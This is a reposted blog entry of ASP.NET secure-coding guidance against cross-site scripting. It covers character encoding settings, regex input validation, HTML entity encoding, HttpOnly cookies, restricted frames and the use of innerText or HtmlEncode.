To successfully restrict valid data for your Web pages, you should limit the ways in which the input data can be represented. This prevents malicious users from using canonicalization and multi-byte escape sequences to trick your input validation routines. A multi-byte escape sequence attack is a subtle manipulation that uses the fact that character encodings, such as uniform translation format-8 (UTF-8), use multi-byte sequences to represent non-ASCII characters. Some byte sequences are not legitimate UTF-8, but they may be accepted by some UTF-8 decoders, thus providing an exploitable security hole.

ASP.NET allows you to specify the character set at the page level or at the application level by using the <globalization> element in the Web.config file. The following code examples show both approaches and use the ISO-8859-1 character encoding, which is the default in early versions of HTML and HTTP.

To set the character encoding at the page level, use the <meta> element or the ResponseEncoding page-level attribute as follows:

<meta http-equiv="Content Type"
      content="text/html; charset=ISO-8859-1" />
OR
<% @ Page ResponseEncoding="iso-8859-1" %>

To set the character encoding in the Web.config file, use the following configuration.

<configuration>
   <system.web>
      <globalization
         requestEncoding="iso-8859-1"
         responseEncoding="iso-8859-1"/>
   </system.web>
</configuration>

Validating Unicode Characters

Use the following code to validate Unicode characters in a page.

using System.Text.RegularExpressions;

...

public class WebForm1 : System.Web.UI.Page
{
  private void Page_Load(object sender, System.EventArgs e)
  {
    // Name must contain between 1 and 40 alphanumeric characters
    // and (optionally) special characters such as apostrophes
    // for names such as O'Dell
    if (!Regex.IsMatch(Request.Form["name"],
               @"^[\p{L}\p{Zs}\p{Lu}\p{Ll}\']{1,40}$"))
      throw new ArgumentException("Invalid name parameter");

    // Use individual regular expressions to validate other parameters
    ...
  }
}

The following explains the regular expression shown in the preceding code:

^ means start looking at this position.
\p{ ..} matches any character in the named character class specified by {..}.
{L} performs a left-to-right match.
{Lu} performs a match of uppercase.
{Ll} performs a match of lowercase.
{Zs} matches separator and space.
'matches apostrophe.
{1,40} specifies the number of characters: no less than 1 and no more than 40.
$ means stop looking at this position.
Do Not Rely on Input Sanitization

A common practice is for code to attempt to sanitize input by filtering out known unsafe characters. Do not rely on this approach because malicious users can usually find an alternative means of bypassing your validation. Instead, your code should check for known secure, safe input. Table 1 shows various safe ways to represent some common characters.

Table 1: Character Representation

Characters

Decimal

Hexadecimal

HTML Character Set

Unicode

" (double quotation marks)

&#34

&#x22

&quot;

\u0022

' (single quotation mark)

&#39

&#x27

&apos;

\u0027

& (ampersand)

&#38

&#x26

&amp;

\u0026

< (less than)

&#60

&#x3C

&lt;

\u003c

> (greater than)

&#62

&#x3E

&gt;

\u003e

Use the HttpOnly Cookie Option

The HttpOnly cookie attribute prevents client-side scripts from accessing a cookie from the document.cookie property. Instead, the script returns an empty string. The cookie is still sent to the server whenever the user browses to a Web site in the current domain.

Use the <frame> Security Attribute

You can set the security attribute for the <frame> and <iframe> elements. You can use the security attribute to apply the user's Restricted Sites Internet Explorer security zone settings to an individual frame or iframe. By default, the Restricted Sites zone does not support script execution.

If you use the security attribute, it must be set to "restricted" as shown in the following.

<frame security="restricted" src="http://www.somesite.com/somepage.htm"></frame>

Use the innerText Property Instead of innerHTML

If you use the innerHTML property to build a page and the HTML is based on potentially untrusted input, you must use HtmlEncode to make it safe. To avoid having to remember to do this, use innerText instead. The innerText property renders content safe and ensures that scripts are not executed.

The following example shows this approach for two HTML <span> controls. The code in the Page_Load method sets the text displayed in the Welcome1 <span> element using the innerText property, so HTML-encoding is unnecessary. The code sets the text in the Welcome2 <span> element by using the innerHtml property; therefore, you must HtmlEncode it first to make it safe.

<%@ Page Language="C#" AutoEventWireup="true"%>

<html>
  <body>
    <span id="Welcome1" runat="server"> </span>
    <span id="Welcome2" runat="server"> </span>
  </body>
</html>

<script runat="server">
  private void Page_Load(Object Src, EventArgs e)
  {
    // Using InnerText renders the content safe-no need to HtmlEncode
    Welcome1.InnerText = "Hello, " + User.Identity.Name;

    // Using InnerHtml requires the use of HtmlEncode to make it safe
    Welcome2.InnerHtml = "Hello, " +
                        Server.HtmlEncode(User.Identity.Name);
  }
</Script>

Posted By आर्यावर्त3:20 AM